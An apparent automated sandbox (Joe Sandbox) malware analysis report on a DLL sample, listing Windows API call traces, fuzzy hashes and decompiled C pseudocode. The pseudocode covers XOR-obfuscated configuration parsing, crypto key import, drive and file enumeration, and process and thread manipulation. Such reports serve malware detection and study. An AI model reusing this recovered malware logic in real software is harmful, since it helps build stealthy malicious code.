                • Instruction ID: dc1c9f09e8a4dbd521e3fba0045e92bfc30375b39ea718a445b9121654fa861b
                • Opcode Fuzzy Hash: 782c0ced67d9590cb07f6ed3012636709a9d20cc01dbc84226c0118056f69c69
                • Instruction Fuzzy Hash: 01118E71A45505AFDB14DF16EC49CA63BE5EB90718B04A12AE40D8F2A5F737BC40CF61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • HeapFree.KERNEL32(00000000,00000000,00000000,046EE21C,?,00000000,?,?,?,00000000,046D4935,046E3A35,00000000,00000000), ref: 046C9D96
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(046EE21C,0000002E,00000000,00000000,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFF9D
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(00000004,00000020,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFFAC
                  • Part of subcall function 046E0929: CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,74E5F5B0,046D47CC,?,00000001), ref: 046E094F
                  • Part of subcall function 046E0929: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 046E095B
                  • Part of subcall function 046E0929: GetModuleHandleA.KERNEL32(?,04C9978E,?,00000000,00000000), ref: 046E097B
                  • Part of subcall function 046E0929: GetProcAddress.KERNEL32(00000000), ref: 046E0982
                  • Part of subcall function 046E0929: Thread32First.KERNEL32(00000001,0000001C), ref: 046E0992
                  • Part of subcall function 046E0929: CloseHandle.KERNEL32(00000001), ref: 046E09DA
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                • String ID:
                • API String ID: 2627809124-0
                • Opcode ID: 2b8d6ad0d122aa76c74f2762fcc2fd831197b4366ad4fb9268458fce24efd2a2
                • Instruction ID: c6b08e7c070320635860c3ac6e3af45a484d786e0dcd6f48b20def953646c6db
                • Opcode Fuzzy Hash: 2b8d6ad0d122aa76c74f2762fcc2fd831197b4366ad4fb9268458fce24efd2a2
                • Instruction Fuzzy Hash: 26017CB1614118BFEB05EBAAED84CAFB7EDEB44348700105AF501A7201F636BE04CB74
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,046D4930,046E3A35,00000000,00000000), ref: 046D73B7
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(046EE21C,0000002E,00000000,00000000,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFF9D
                  • Part of subcall function 046CFF8B: StrChrA.SHLWAPI(00000004,00000020,?,046EE21C,046D739D,00000000,00000000,00000000), ref: 046CFFAC
                  • Part of subcall function 046CB823: lstrlen.KERNEL32(046C1127,?,00000000,00000000,046C2C06,00000011,046C1127,00000001,00000000,?,-00000008,?,046C1127,00000000,?,?), ref: 046CB853
                  • Part of subcall function 046CB823: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 046CB869
                  • Part of subcall function 046CB823: memcpy.NTDLL(00000010,?,00000000), ref: 046CB89F
                  • Part of subcall function 046CB823: memcpy.NTDLL(00000010,00000000,?), ref: 046CB8BA
                  • Part of subcall function 046CB823: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 046CB8D8
                  • Part of subcall function 046CB823: GetLastError.KERNEL32 ref: 046CB8E2
                  • Part of subcall function 046CB823: HeapFree.KERNEL32(00000000,00000000), ref: 046CB905
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                • String ID:
                • API String ID: 730886825-0
                • Opcode ID: cb41af87c14d5f3853f143bd919b9fdac330b1425af006ec01891bbc044db1f2
                • Instruction ID: 82569582667e4e52d9b06861b791e09d4b816b6068af5b3ac5e25b88952f8869
                • Opcode Fuzzy Hash: cb41af87c14d5f3853f143bd919b9fdac330b1425af006ec01891bbc044db1f2
                • Instruction Fuzzy Hash: 51015E71950204FFEB11DB95DD0AF9A77ECEB45714F100069F601AB280F675BE00D766
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • memset.NTDLL ref: 046D5E25
                  • Part of subcall function 046C3B19: memset.NTDLL ref: 046C3B3F
                  • Part of subcall function 046C3B19: memcpy.NTDLL ref: 046C3B67
                  • Part of subcall function 046C3B19: GetLastError.KERNEL32(00000010,00000218,046E6D9D,00000100,?,00000318,00000008), ref: 046C3B7E
                  • Part of subcall function 046C3B19: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,046E6D9D,00000100), ref: 046C3C61
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastmemset$AllocateHeapmemcpy
                • String ID:
                • API String ID: 4290293647-0
                • Opcode ID: 58fa3e1844877e0bb56c8be9a8980e543865f8c9ea10c76ff56b2ce295575133
                • Instruction ID: fa90c566fde0c26893d287021fa6229e258db684ca5613a4467630a08596ca5f
                • Opcode Fuzzy Hash: 58fa3e1844877e0bb56c8be9a8980e543865f8c9ea10c76ff56b2ce295575133
                • Instruction Fuzzy Hash: B701AD30A013186BD721AF2ADC40FAB7BE8EF45758F00882EFD4596640E3B1F9448AE4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E01C11628(void* __ecx, void* __edx, void* _a4, void* _a8) {
                				void* _t13;
                				void* _t21;
                
                				_t11 =  &_a4;
                				_t21 = 0;
                				__imp__( &_a8);
                				_t13 = E01C178F2( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
                				if(_t13 == 0) {
                					_t21 = E01C12114(_a8 + _a8);
                					if(_t21 != 0) {
                						E01C14AF1(_a4, _t21, _t23);
                					}
                					E01C12C11(_a4);
                				}
                				return _t21;
                			}

                APIs
                • lstrlen.KERNEL32(?,?,?,00000000,?,01C15328,00000000,?,?,?,01C17675,?,021795B0), ref: 01C11639
                  • Part of subcall function 01C178F2: CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,01C17307), ref: 01C1792A
                  • Part of subcall function 01C178F2: memcpy.NTDLL(?,01C17307,00000010,?,?,?,?,?,?,?,?,?,?,01C11ACD,00000000,01C14F92), ref: 01C17943
                  • Part of subcall function 01C178F2: CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 01C1796C
                  • Part of subcall function 01C178F2: CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 01C17984
                  • Part of subcall function 01C178F2: memcpy.NTDLL(00000000,01C14F92,01C17307,0000011F), ref: 01C179D6
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                • String ID:
                • API String ID: 894908221-0
                • Opcode ID: 82331c8af34ecdfbe3fdba9db800ebcd380e95bf2fe1135f4d7be20adb5185e0
                • Instruction ID: 1889dd6ac20cd006c1477afaaccd50fc4bc2604ba9bb6585a4cab55c235641a2
                • Opcode Fuzzy Hash: 82331c8af34ecdfbe3fdba9db800ebcd380e95bf2fe1135f4d7be20adb5185e0
                • Instruction Fuzzy Hash: 1FF03036140109FADF11AE65DC40CDE3BADEF97650B058011FE098A014DA76DA55B7A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E01C14F81(void* __edi, void* _a4) {
                				int _t7;
                				int _t12;
                
                				_t7 = E01C11A55(__edi, _a4,  &_a4); // executed
                				_t12 = _t7;
                				if(_t12 != 0) {
                					memcpy(__edi, _a4, _t12);
                					 *((char*)(__edi + _t12)) = 0;
                					E01C12C11(_a4);
                				}
                				return _t12;
                			}


                APIs
                  • Part of subcall function 01C11A55: memcpy.NTDLL(00000000,00000110,?,?,?,?,01C14F92,?,01C17307,01C17307,?), ref: 01C11A8B
                  • Part of subcall function 01C11A55: memset.NTDLL ref: 01C11B00
                  • Part of subcall function 01C11A55: memset.NTDLL ref: 01C11B14
                • memcpy.NTDLL(?,01C17307,00000000,?,01C17307,01C17307,?,?,01C17307,?), ref: 01C14F9D
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: memcpymemset$FreeHeap
                • String ID:
                • API String ID: 3053036209-0
                • Opcode ID: b53cf103f4b62675a3e065fb4641e543fa228ec0c8597d05b78cf9eb67a54f6e
                • Instruction ID: 92e6ad518ecce88ee8ef6c779399bf8e77dca785d96f01d69fa3e9df480d009e
                • Opcode Fuzzy Hash: b53cf103f4b62675a3e065fb4641e543fa228ec0c8597d05b78cf9eb67a54f6e
                • Instruction Fuzzy Hash: C2E08C3744512AF6CB122A94DC00DEFBF9C9F636A0F048021FE488A208E626C650B3E1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 046CF611
                  • Part of subcall function 046DA2DD: RegOpenKeyExA.KERNELBASE(046CF629,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,046CF629,80000001,?,046DE99E), ref: 046DA324
                  • Part of subcall function 046DA2DD: RegOpenKeyExA.ADVAPI32(046CF629,046CF629,00000000,00020019,80000001,?,046CF629,80000001,?,046DE99E), ref: 046DA33A
                  • Part of subcall function 046DA2DD: RegCloseKey.ADVAPI32(80000001,80000001,?,046DE99E,046DE9AE,?,046CF629,80000001,?,046DE99E), ref: 046DA383
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Open$Closememset
                • String ID:
                • API String ID: 1685373161-0
                • Opcode ID: aa98b2b64fa9a898baeff2053dee30706ccb1b44704b35404b482207630a9039
                • Instruction ID: d6af40eb920e02627f9ad4ea6630b109127651311f6888dd793ec43471bda2b8
                • Opcode Fuzzy Hash: aa98b2b64fa9a898baeff2053dee30706ccb1b44704b35404b482207630a9039
                • Instruction Fuzzy Hash: D8E08C31200108B7EB10AE81C801FA87714DF44248F008018BE095A682EA32F660D6D4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                  • Part of subcall function 046CB5C2: ExpandEnvironmentStringsW.KERNEL32(046C1BC3,00000000,00000000,00000001,00000000,00000000,?,046C1BC3,00000000,?,?,?,7673D3B0,?,74E05520), ref: 046CB5D9
                  • Part of subcall function 046CB5C2: ExpandEnvironmentStringsW.KERNEL32(046C1BC3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,046C31AF,?,?,?), ref: 046CB5F3
                • lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 046DD3E9
                • lstrlenW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,046C39E4), ref: 046DD3F5
                • memset.NTDLL ref: 046DD43D
                • FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD458
                • lstrlenW.KERNEL32(0000002C), ref: 046DD490
                • lstrlenW.KERNEL32(?), ref: 046DD498
                • memset.NTDLL ref: 046DD4BB
                • wcscpy.NTDLL ref: 046DD4CD
                • PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 046DD4F3
                • RtlEnterCriticalSection.NTDLL(?), ref: 046DD528
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                • RtlLeaveCriticalSection.NTDLL(?), ref: 046DD544
                • FindNextFileW.KERNEL32(?,00000000), ref: 046DD55D
                • WaitForSingleObject.KERNEL32(00000000), ref: 046DD56F
                • FindClose.KERNEL32(?), ref: 046DD584
                • FindFirstFileW.KERNEL32(00000000,00000000), ref: 046DD598
                • lstrlenW.KERNEL32(0000002C), ref: 046DD5BA
                • FindNextFileW.KERNEL32(?,00000000), ref: 046DD630
                • WaitForSingleObject.KERNEL32(00000000), ref: 046DD642
                • FindClose.KERNEL32(?), ref: 046DD65D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
                • String ID:
                • API String ID: 2962561936-0
                • Opcode ID: 816b1c21d074393561604dfb6a453a34aba0f8c3859ead5f2bb27e9ca6d4576d
                • Instruction ID: 76fa2f01df655fd9e7540937848489b631da06512f308b855b0ff34f3e0d8ef9
                • Opcode Fuzzy Hash: 816b1c21d074393561604dfb6a453a34aba0f8c3859ead5f2bb27e9ca6d4576d
                • Instruction Fuzzy Hash: D8817B71904345AFD721BF25CC84A2BBBE9FF98308F04482DF5859B252E774E845CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2D5D
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2D8F
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2DC1
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2DF3
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2E25
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2E57
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2E89
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2EBB
                • StrToIntExA.SHLWAPI(00000000,00000000,?,74E5F710,00000000,00000000), ref: 046C2EED
                • HeapFree.KERNEL32(00000000,?,?,?,?,74E5F710,00000000,00000000), ref: 046C3080
                • StrToIntExA.SHLWAPI(00000000,00000000,?,?,?,?,74E5F710,00000000,00000000), ref: 046C3124
                  • Part of subcall function 046CC5D9: RtlAllocateHeap.NTDLL ref: 046CC61A
                  • Part of subcall function 046CC5D9: memset.NTDLL ref: 046CC62E
                  • Part of subcall function 046CC5D9: GetCurrentThreadId.KERNEL32 ref: 046CC6BB
                  • Part of subcall function 046CC5D9: GetCurrentThread.KERNEL32 ref: 046CC6CE
                  • Part of subcall function 046E31D0: RtlEnterCriticalSection.NTDLL(04C9C0A0), ref: 046E31D9
                  • Part of subcall function 046E31D0: HeapFree.KERNEL32(00000000,?), ref: 046E320B
                  • Part of subcall function 046E31D0: RtlLeaveCriticalSection.NTDLL(04C9C0A0), ref: 046E3229
                • HeapFree.KERNEL32(00000000,?,?,?,?,74E5F710,00000000,00000000), ref: 046C30CC
                  • Part of subcall function 046DED70: lstrlen.KERNEL32(00000000,7673D3B0,?,00000000,046C32A8,00000000,74E5F710,00000000,00000000), ref: 046DED79
                  • Part of subcall function 046DED70: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 046DED9C
                  • Part of subcall function 046DED70: memset.NTDLL ref: 046DEDAB
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$Free$CriticalCurrentSectionThreadmemset$AllocateEnterLeavelstrlenmemcpy
                • String ID:
                • API String ID: 3296958911-0
                • Opcode ID: 2a3ee075e1e4422b784c6205e543ee166e8a5c386f61b6c6dffbc5d882393a1f
                • Instruction ID: d4c101c3c6f2f41910bc8050090dabaf14fa38dd26bf1288ad40a9e444f23105
                • Opcode Fuzzy Hash: 2a3ee075e1e4422b784c6205e543ee166e8a5c386f61b6c6dffbc5d882393a1f
                • Instruction Fuzzy Hash: A5F17CB1F10116AF9B10EF75D898D7A33E8EB28704715986DEC02EB304FA35FD429A65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 046C1DA3
                • GetLastError.KERNEL32 ref: 046C1DB1
                • NtSetInformationProcess.NTDLL ref: 046C1E0B
                • GetProcAddress.KERNEL32(?,00000000), ref: 046C1E4A
                • GetProcAddress.KERNEL32(?), ref: 046C1E6B
                • TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 046C1EC2
                • CloseHandle.KERNEL32(?), ref: 046C1ED8
                • CloseHandle.KERNEL32(?), ref: 046C1EFE
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
                • String ID:
                • API String ID: 3529370251-0
                • Opcode ID: 9a87b4d90decb7fa58259e760098ae12a19aa037ef0c847187bdfb72339bd38f
                • Instruction ID: b45c74fa9c63e92cd9064480ea0bf9bf1b695647595f8f916a7128c61ec366ae
                • Opcode Fuzzy Hash: 9a87b4d90decb7fa58259e760098ae12a19aa037ef0c847187bdfb72339bd38f
                • Instruction Fuzzy Hash: BA418C70204342DFD7109F65D848AAABBE4FB89348F00092DF554D7251F775EA45CFA2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • wcscpy.NTDLL ref: 046DFDB6
                • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 046DFDC2
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DFDD3
                • memset.NTDLL ref: 046DFDF0
                • GetLogicalDriveStringsW.KERNEL32(?,?), ref: 046DFDFE
                • WaitForSingleObject.KERNEL32(00000000), ref: 046DFE0C
                • GetDriveTypeW.KERNEL32(?), ref: 046DFE1A
                • lstrlenW.KERNEL32(?), ref: 046DFE26
                • wcscpy.NTDLL ref: 046DFE38
                • lstrlenW.KERNEL32(?), ref: 046DFE52
                • HeapFree.KERNEL32(00000000,?), ref: 046DFE6B
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
                • String ID:
                • API String ID: 3888849384-0
                • Opcode ID: 7728703e9ba519aa0902ad191eb0f5482625bf2b25cee3f4c7cd7bdc15fa6074
                • Instruction ID: f7697183547496f4c67f96506e2a6ea69e1fe205a8a0d2abb8369063ca08fc0c
                • Opcode Fuzzy Hash: 7728703e9ba519aa0902ad191eb0f5482625bf2b25cee3f4c7cd7bdc15fa6074
                • Instruction Fuzzy Hash: D1311A32800119BFDB15ABA6DC88CEFBBB9FF49360B104465F105E7111FB39AA55DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E01C14BB3(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                				int _v8;
                				void* _v12;
                				void* _v16;
                				signed int _t28;
                				signed int _t33;
                				signed int _t39;
                				char* _t45;
                				char* _t46;
                				char* _t47;
                				char* _t48;
                				char* _t49;
                				char* _t50;
                				void* _t51;
                				void* _t52;
                				void* _t53;
                				intOrPtr _t54;
                				void* _t56;
                				intOrPtr _t57;
                				intOrPtr _t58;
                				signed int _t61;
                				intOrPtr _t64;
                				signed int _t65;
                				signed int _t70;
                				void* _t72;
                				void* _t73;
                				signed int _t75;
                				signed int _t78;
                				signed int _t82;
                				signed int _t86;
                				signed int _t90;
                				signed int _t94;
                				signed int _t98;
                				void* _t101;
                				void* _t102;
                				void* _t115;
                				void* _t118;
                				intOrPtr _t121;
                
                				_t118 = __esi;
                				_t115 = __edi;
                				_t104 = __ecx;
                				_t101 = __ebx;
                				_t28 =  *0x1c1a2d4; // 0x69b25f44
                				if(E01C13E4F( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                					 *0x1c1a330 = _v8;
                				}
                				_t33 =  *0x1c1a2d4; // 0x69b25f44
                				if(E01C13E4F( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                					_v12 = 2;
                					L69:
                					return _v12;
                				}
                				_t39 =  *0x1c1a2d4; // 0x69b25f44
                				_push(_t115);
                				if(E01C13E4F( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                					L67:
                					HeapFree( *0x1c1a290, 0, _v16);
                					goto L69;
                				} else {
                					_push(_t101);
                					_t102 = _v12;
                					if(_t102 == 0) {
                						_t45 = 0;
                					} else {
                						_t98 =  *0x1c1a2d4; // 0x69b25f44
                						_t45 = E01C12ECD(_t104, _t102, _t98 ^ 0x7895433b);
                					}
                					_push(_t118);
                					if(_t45 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                							 *0x1c1a298 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t46 = 0;
                					} else {
                						_t94 =  *0x1c1a2d4; // 0x69b25f44
                						_t46 = E01C12ECD(_t104, _t102, _t94 ^ 0x219b08c7);
                					}
                					if(_t46 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                							 *0x1c1a29c = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t47 = 0;
                					} else {
                						_t90 =  *0x1c1a2d4; // 0x69b25f44
                						_t47 = E01C12ECD(_t104, _t102, _t90 ^ 0x31fc0661);
                					}
                					if(_t47 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                							 *0x1c1a2a0 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t48 = 0;
                					} else {
                						_t86 =  *0x1c1a2d4; // 0x69b25f44
                						_t48 = E01C12ECD(_t104, _t102, _t86 ^ 0x0cd926ce);
                					}
                					if(_t48 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                							 *0x1c1a008 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t49 = 0;
                					} else {
                						_t82 =  *0x1c1a2d4; // 0x69b25f44
                						_t49 = E01C12ECD(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                					}
                					if(_t49 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                							 *0x1c1a030 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t50 = 0;
                					} else {
                						_t78 =  *0x1c1a2d4; // 0x69b25f44
                						_t50 = E01C12ECD(_t104, _t102, _t78 ^ 0x2878b929);
                					}
                					if(_t50 == 0) {
                						L41:
                						 *0x1c1a2a4 = 5;
                						goto L42;
                					} else {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                							goto L41;
                						} else {
                							L42:
                							if(_t102 == 0) {
                								_t51 = 0;
                							} else {
                								_t75 =  *0x1c1a2d4; // 0x69b25f44
                								_t51 = E01C12ECD(_t104, _t102, _t75 ^ 0x261a367a);
                							}
                							if(_t51 != 0) {
                								_push(_t51);
                								_t72 = 0x10;
                								_t73 = E01C16659(_t72);
                								if(_t73 != 0) {
                									_push(_t73);
                									E01C13F8C();
                								}
                							}
                							if(_t102 == 0) {
                								_t52 = 0;
                							} else {
                								_t70 =  *0x1c1a2d4; // 0x69b25f44
                								_t52 = E01C12ECD(_t104, _t102, _t70 ^ 0xb9d404b2);
                							}
                							if(_t52 != 0 && E01C16659(0, _t52) != 0) {
                								_t121 =  *0x1c1a384; // 0x21795b0
                								E01C1219A(_t121 + 4, _t68);
                							}
                							if(_t102 == 0) {
                								_t53 = 0;
                							} else {
                								_t65 =  *0x1c1a2d4; // 0x69b25f44
                								_t53 = E01C12ECD(_t104, _t102, _t65 ^ 0x3df17130);
                							}
                							if(_t53 == 0) {
                								L59:
                								_t54 =  *0x1c1a2d8; // 0x55d5a8
                								_t22 = _t54 + 0x1c1b252; // 0x616d692f
                								 *0x1c1a32c = _t22;
                								goto L60;
                							} else {
                								_t64 = E01C16659(0, _t53);
                								 *0x1c1a32c = _t64;
                								if(_t64 != 0) {
                									L60:
                									if(_t102 == 0) {
                										_t56 = 0;
                									} else {
                										_t61 =  *0x1c1a2d4; // 0x69b25f44
                										_t56 = E01C12ECD(_t104, _t102, _t61 ^ 0xd2079859);
                									}
                									if(_t56 == 0) {
                										_t57 =  *0x1c1a2d8; // 0x55d5a8
                										_t23 = _t57 + 0x1c1b79a; // 0x6976612e
                										_t58 = _t23;
                									} else {
                										_t58 = E01C16659(0, _t56);
                									}
                									 *0x1c1a3a0 = _t58;
                									HeapFree( *0x1c1a290, 0, _t102);
                									_v12 = 0;
                									goto L67;
                								}
                								goto L59;
                							}
                						}
                					}
                				}
                			}


                APIs
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14C58
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14C8A
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14CBC
                • StrToIntExA.SHLWAPI(00000000,00000000,?,01C1A010,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 01C14CEE
